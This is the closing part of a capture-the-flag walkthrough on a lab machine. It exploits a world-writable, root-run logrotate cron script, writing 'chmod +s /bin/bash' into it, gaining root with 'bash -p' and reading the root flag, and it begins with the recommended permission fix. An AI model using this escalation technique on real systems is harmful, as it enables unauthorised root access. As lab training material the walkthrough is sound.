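On the sample the only finding is /etc/logrotate.d/logrotate at 0o777, which is exactly the condition exploited below; the fix is to make root-run scripts owned by root with mode 0755 or tighter, and to extend the same walk to /etc/cron.d and the run-parts directories.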

Back up the file first

www-data@lemonsqueezy:/etc/logrotate.d$ cp logrotate /var/www/html/wordpress/logrotate.bak
rotate.bakte /var/www/html/wordpress/logr
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash' >> logrotate
echo 'chmod +s /bin/bash' >> logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /tmp/* ')
except:
    sys.exit()
chmod +s /bin/bash
www-data@lemonsqueezy:/etc/logrotate.d$ ls -la /bin/bash
ls -la /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

Appending the line alone is affected by the file's existing contents (it is run as a Python script, so the appended line is not executed as a shell command), so overwrite the file instead.

www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash ' > logrotate
echo 'chmod +s /bin/bash ' > logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
chmod +s /bin/bash 
www-data@lemonsqueezy:/etc/logrotate.d$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

The change once the cron job has run:

Escalate directly

www-data@lemonsqueezy:/etc/logrotate.d$ bash -p
bash -p
bash-4.4# whoami
whoami
root
bash-4.4# pwd
pwd
/etc/logrotate.d
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.txt
bash-4.4# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
bash-4.4# 

That concludes this walkthrough of the target machine.
